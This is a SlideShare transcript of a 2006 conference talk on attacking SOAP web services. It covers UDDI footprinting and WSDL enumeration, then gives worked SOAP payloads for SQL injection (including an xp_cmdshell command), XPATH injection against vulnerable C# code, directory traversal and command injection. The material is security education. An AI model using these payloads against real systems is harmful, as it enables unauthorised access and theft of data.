Advanced Web Services Hacking (AusCERT 06)

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

2 comments

Comments 1 - 2 of 2 previous next Post a comment

Post a comment
Embed Video
Edit your comment Cancel

12 Favorites

Advanced Web Services Hacking (AusCERT 06) - Presentation Transcript

  1. Advanced Web Services Hacking Attacks & Defense Shreeraj Shah
  2. Introduction Founder & Director G Net Square (Brief) – Past experience G Chase, IBM & Foundstone – Interest G Web security research – Published G Advisories, Tools, Papers etc. – Book G Web Hacking – http://shreeraj.blogspot.com shreeraj@net-square.com Shreeraj Shah
  3. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  4. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  5. Industry Web 2.0 Applications are on the rise G Rich Internet Applications (RIA) – G reshaping application front Web Services on the rise – forming G backend of applications Gartner is advising companies to take up G Web services now, or risk losing out to competitors embracing the technology. Shreeraj Shah
  6. Industry By 2008, those without Web Services or G Service-Oriented Architecture (SOA) would find their competitors had left them in the dust. [Gartner] 2006-07 would see the top 2000 global G companies pick up the technology and make it mainstream. Government and SMB would finally follow in 2008. Web services would rocket from $1.6 G billion in 2004 to $34 billion by 2007. [IDC] Shreeraj Shah
  7. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  8. Technologies Web Services is forming back end and G accessible on SOAP AJAX – empowering browsers G XML based services G Rich Internet Applications are consuming G back end web services Search engines and mechanisms for web G services publishing and accessing Security evolving around web services G Shreeraj Shah
  9. Technologies Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB Shreeraj Shah Internal/Corporate
  10. Technologies Simple GET/POST Simple AJAX HTTP resource Web Calls Web Services Server resource Web Services Client Shreeraj Shah
  11. Web services stack Presentation Stack XML Security Stack WS-Security Discovery Stack UDDI, DISCO Access Stack WSDL,SOAP Transport Stack HTTP, HTTPS Shreeraj Shah
  12. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  13. Security! Web service - evolving as new attack G point in application framework. Toolkits and Exploits are coming up G Too many protocols and confusion G Race for deployment – poor G implementation Cases and attacks are growing with G growth in business usage Shreeraj Shah
  14. Agenda Web Services Attack Vectors Strategies Tools & & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  15. Assessment strategies Web Services Risk Model Blackbox Whitebox Assessment Assessment Web Services Defense Controls Shreeraj Shah
  16. Risk - In transit In transit Sniffing or Spoofing G WS-Routing security concern G Replay attacks G Shreeraj Shah
  17. Risk - Web services Engine Buffer overflow G XML parsing attacks G Spoiling Schema G Complex or Recursive structure as payload G Denial of services G Large payload G Shreeraj Shah
  18. Web services Deployment - Risk Fault code leaks G Permissions & Access issues G Poor policies G Customized error leakage G Authentication and Certification G Shreeraj Shah
  19. Web services User code - Risk Parameter tampering G WSDL probing G SQL/LDAP/XPATH/OS command injection G Virus/Spyware/Malware injection G Bruteforce G Data type mismatch G Content spoofing G Session tampering G Format string G Information leakage G Authorization G Shreeraj Shah
  20. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  21. wschess (Tool) wsPawn wsFootprint Footprinting wsSearch wsDiscovery Discovery Public domain search wsEnum wsKnight Enumeration wsAudit wsProxy Manual Audit Auto Audit wsMod wsRook Defense Download : http://net-square.com/wschess/ Shreeraj Shah
  22. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods •Footprinting •Discovery Defense Controls •Public Domain Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  23. Web Services Footprinting Shreeraj Shah
  24. Footprinting Objectives G Place for web services… – We may know the company name in this – case? Do we have any whois for web services? – If we answer above questions then we can – have enough information on what to assess? Shreeraj Shah
  25. UDDI Universal Description, Discovery, and G Integration (UDDI) It acts as White/Yellow/Green pages G Xmethods etc… G Information can be published and retrieved G from Gets replicated across networks over G internet Shreeraj Shah
  26. UDDI It includes G businessEntity – businessService – bindingTemplate – tModel – Shreeraj Shah
  27. Footprinting Business Name POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 229 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_business generic="2.0" maxRows="100" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_business> </Body> </Envelope>HTTP/1.1 100 Continue Shreeraj Shah
  28. Footprinting Business Name HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 09:53:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1339 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><businessList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><businessInfos><businessInfo businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services for Testing</name><description xml:lang="ko">Amazon Web Services 2.0 - We now offer software developers the opportunity to integrate Amazon.com</description><serviceInfos><serviceInfo serviceKey="41213238-1b33-40f4-8756- c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo></serviceInfos></businessInfo><businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5"><name xml:lang="en">Amazon.com</name><description xml:lang="en">E-commerce website and platform for finding, discovering, and buying products online.</description><serviceInfos><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo></serviceInfos></businessInfo></businessInfos></businessList></soap:Bod Shreeraj Shah y></soap:Envelope>
  29. Footprinting Services POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 213 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_service generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_service> </Body> </Envelope> HTTP/1.1 100 Continue Shreeraj Shah
  30. Footprinting Services HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:07:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1272 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos><serviceInfo serviceKey="6ec464e0-2f8d-4daf-b4dd-5dd4ba9dc8f3" businessKey="914374fb-f10f-4634-b8ef- c9e34e8a0ee5"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo><serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo><serviceInfo serviceKey="bc82a008-5e4e-4c0c-8dba-c5e4e268fe12" businessKey="18785586-295e-448a-b759- ebb44a049f21"><name xml:lang="en">AmazonBookPrice</name></serviceInfo><serviceInfo serviceKey="8faa80ea-42dd-4c0d-8070-999ce0455930" businessKey="ee41518b-bf99-4a66-9e9e- c33c4c43db5a"><name xml:lang="en">AmazonBookPrice</name></serviceInfo></serviceInfos></serviceList></soap:Body></soap: Envelope> Shreeraj Shah
  31. Footprinting t-Models POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 211 <?xml version="1.0" encoding="UTF-8" ?><Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"><Body><find_tModel generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_tModel></Body></Envelope> HTTP/1.1 100 Continue Shreeraj Shah
  32. Footprinting t-Models HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:12:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 516 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><tModelList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><tModelInfos><tModelInfo tModelKey="uuid:c5da9443-d058-4ede-9db1- 4f1d5deb805c"><name>Amazon Web Services 2.0 WSDL File</name></tModelInfo></tModelInfos></tModelList></soap:Body></soap:Envelope> DEMO Shreeraj Shah
  33. Web Services Discovery Shreeraj Shah
  34. Web Service Discovery After footprinting web services next step is G to perform discovery. On the basis of services found one can do G so. Finding access point for web services will G point to its discovery. Discovery is the key to the kingdom. G Once again over UDDI. G Shreeraj Shah
  35. Web Service Discovery From various keys – Service and Business G one can dig access point from UBN. This is a part of protocol and identified from G XML block itself. DEMO Shreeraj Shah
  36. Web Service Search Search in public domain G Use – Search Engines G Google & MSN – An excellent tool G Look for wsdl,asmx,jws etc. G Filetype and allinurl are best friends G Leveraging Web APIs G DEMO Shreeraj Shah
  37. Web Services Enumeration & Profiling Shreeraj Shah
  38. Technology Identification Running on which platform? G Configuration and Structures G File extensions G Path discovery G This is very useful information G Shreeraj Shah
  39. Demo Application Web Services Location of WSDL Shreeraj Shah
  40. Technology Identification Location can be obtained from UDDI as well G if already published. G WSDL location [ Access Point ] http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS Shreeraj Shah
  41. Technology Identification Similarly .jws – for Java web services G /ws/ - in the path indicates web services G MS-SOAPToolkit can be identified as well G C:>nc 192.168.11.2 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:48:20 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 7565 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/ Cache-control: private Shreeraj Shah
  42. Technology Identification Resource header spits some information as G well C:>nc 192.168.11.2 80 HEAD /ws/dvds4less.asmx HTTP/1.0 HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:50:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3026 Shreeraj Shah
  43. WSDL Scanning/Enumeration What is WSDL? G What information one can G enumerate from WSDL? WSDL exposure is threat or not? G Shreeraj Shah
  44. WSDL WSDL is web services definition G language It is similar to old IDL for remote G calls used in CORBA or other remote invoke methods. It contains detail of methods G Types of I/O G Parameters of methods G It is XML document with standards. G Shreeraj Shah
  45. Nodes of WSDL Data types Message Operations Types Service Access Binding Shreeraj Shah
  46. WSDL <Service> <service name="dvds4less"> <port name="dvds4lessSoap" binding="s0:dvds4lessSoap"> <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/> </port> </service> Where the call is going to hit? It is where service is listening. Shreeraj Shah
  47. WSDL <portType> Methods one Can call <portType name="dvds4lessSoap"> <operation name="Intro"> <input message="s0:IntroSoapIn"/> <output message="s0:IntroSoapOut"/> </operation> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> <operation name="getRebatesInfo"> <input message="s0:getRebatesInfoSoapIn"/> <output message="s0:getRebatesInfoSoapOut"/> </operation> </portType> Shreeraj Shah
  48. WSDL <Message> <portType name="dvds4lessSoap"> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> </portType> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> Shreeraj Shah
  49. WSDL <Types> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> <s:element name="getProductInfo"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/> </s:sequence> </s:complexType> </s:element> <s:element name="getProductInfoResponse"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/> Shreeraj Shah
  50. WSDL Profile after Scan Methods INPUT OUTPUT Intro -No- String getProductInfo String String getRebatesInfo String String DEMO Shreeraj Shah
  51. How it looks? Intro WSDL <PortType> Web Services Remote getProductInfo <Service> Code Invokes <Message> <Types> OR getRebatesInfo Class Shreeraj Shah
  52. Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah
  53. Web Services Attack Vectors Shreeraj Shah
  54. AV 1 - XML poisoning XML node manipulation G Attack on parsing logic G SAX – DOM – Can be lethal – DoS or breaking G execution logic Shreeraj Shah
  55. XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah
  56. XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName><CustomerNumb er>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah
  57. XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <FirstName>John</FirstName> ... 100 time… <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street<Address> <Email>john@smith.com<Email> <PhoneNumber>3809922347<PhoneNumber> </ CustomerRecord> Shreeraj Shah
  58. AV 2 - Parameter tampering & Fault code leakage Fault code of web services spit lot of G information about internal workings. This attack can fetch internal paths, G database interfaces etc. Fault code is part of SOAP envelope and this G helps an attacker to make logical deduction about assets. DEMO Shreeraj Shah
  59. SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah
  60. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:inetpubwwwroot ebatesabx.xyz&amp;quot;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah
  61. AV 3 - SQL injection SQL injection can be done using SOAP G traffic. It is innovative way of identifying database G interface points. One can leverage xp_cmdshell via SOAP. G Back end database can be compromised G using this attack. DEMO Shreeraj Shah
  62. SOAP request SOAP Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah
  63. SOAP request Product Information <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah
  64. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Fault Code Demo Indicates SQL Server Place for SQL Injection Shreeraj Shah
  65. SOAP response Popular SQL Injection <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Fault Code Shreeraj Shah
  66. SOAP request Works!! <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ Entire Table /(7)Lawrence of Arabia($14.99)/ Is out </getProductInfoResult> </getProductInfoResponse> </soap:Body> Shreeraj Shah
  67. SOAP response Exploiting this Vulnerability <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1;EXEC master..xp_cmdshell 'dir c: > c:inetpubwwwrootwsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploit code Shreeraj Shah
  68. SOAP request Works!! <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Looks Normal response Shreeraj Shah
  69. SOAP request But … Code got executed Looks Normal Got Admin via response cmdshell Shreeraj Shah
  70. AV 4 – XPATH injection XPATH is new way of querying XML G documents. This attack works nicely on web services G since they use XML extensively. Developer’s loophole can be leveraged with G an exploit. XPATH query crafting is next generation G attack methods. Shreeraj Shah
  71. XPATH Injection - Basics XPATH is a language defined to find G information from XML document. As XPATH name suggests it indeed uses G path to traverse through nodes of XML document and look for specific information from the document. XPATH provides expressions like slash (/), G double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document. Shreeraj Shah
  72. XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false Shreeraj Shah
  73. Attacking XPATH point //users[@username='"+user+"' and @password='"+pass+"']"; G XPATH parsing can be leveraged by passing G following string ' or 1=1 or ''=‘ This will always true on the first node and G user can get access as who ever is first user. //users[@username='' or 1=1 or ''='' and @password='any'] G Bingo! DEMO Shreeraj Shah
  74. AV 6 – LDAP injection LDAP authentication in place G Possible to manipulate LDAP queries G May leads to enumeration OR G manipulation Interesting attack vector G Fault code leaks LDAP interface G DEMO Shreeraj Shah
  75. AV 7 – File System access Identifying file system points G Directory traversing & Access G Leads to file access and source code G exposure Lethal if found! G DEMO Shreeraj Shah
  76. SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah
  77. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:inetpubwwwroot ebatesabx.xyz&amp;quot;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah
  78. SOAP request SOAP Forcing file Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>../rebates.asp</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah
  79. SOAP request File Access to system Parameter Temparing <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfoResponse xmlns="http://tempuri.org/"> <getRebatesInfoResult>&lt;% ' file: rebates.asp ' date: 20- AUG-03 ' desc: rebates listing ' author: nd ' client: dvds4less 'check if we have been called with a filename or without loc = request.querystring("loc") lenloc = len(loc) if lenloc &gt; 0 then ' we have been called with a filename ' so print the rebate coupon%&gt;&lt;img ……………………. </getRebatesInfoResult> </getRebatesInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah
  80. AV 7 – SOAP brute forcing SOAP envelope takes user & pass accounts. G It is possible to bruteforce SOAP envelope G and look for specific responses. This is a possible attack which can get into G the system. Analyzing SOAP response is key for this set G of attack. DEMO Shreeraj Shah
  81. AV 8 – Parameter overflow Adding large buffers to XML nodes G Depending on code controls – It may fail in G handling Breaking the application G May compromise as well G Traditional buffer overflow type attacks G DEMO Shreeraj Shah
  82. AV 9 – Operating System access Point to OS G Remote command execution is possible G Either by “|” or “;” G Attack is very much possible G Leads to admin/root on the box… G DEMO Shreeraj Shah
  83. AV 10 – Session hijacking Web services can maintain sessions G [WebMethod(EnableSession=true)] – Possible to reverse engineer session G Cookie tempering is reality… G Can be compared to traditional web G application session. DEMO Shreeraj Shah
  84. Other attacks External referencing – XML schema G XSS attack G In transit attacks – replay and G spoofing Shreeraj Shah

+ shreerajshreeraj, 3 years ago

custom

7669 views, 12 favs, 5 embeds more stats

Advanced Web Services Hacking - Attacks & Defense ( more

More info about this document

© All Rights Reserved

Go to text version

  • Total Views 7669
    • 7591 on SlideShare
    • 78 from embeds
  • Comments 2
  • Favorites 12
  • Downloads 0
Most viewed embeds
  • 32 views on http://www.secguru.com
  • 22 views on http://www.blueinfy.com
  • 20 views on http://mauriziostorani.wordpress.com
  • 3 views on http://blueinfy.com
  • 1 views on https://s3.amazonaws.com

more

All embeds
  • 32 views on http://www.secguru.com
  • 22 views on http://www.blueinfy.com
  • 20 views on http://mauriziostorani.wordpress.com
  • 3 views on http://blueinfy.com
  • 1 views on https://s3.amazonaws.com

less

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

Cancel
File a copyright complaint
Having problems? Go to our helpdesk?

Categories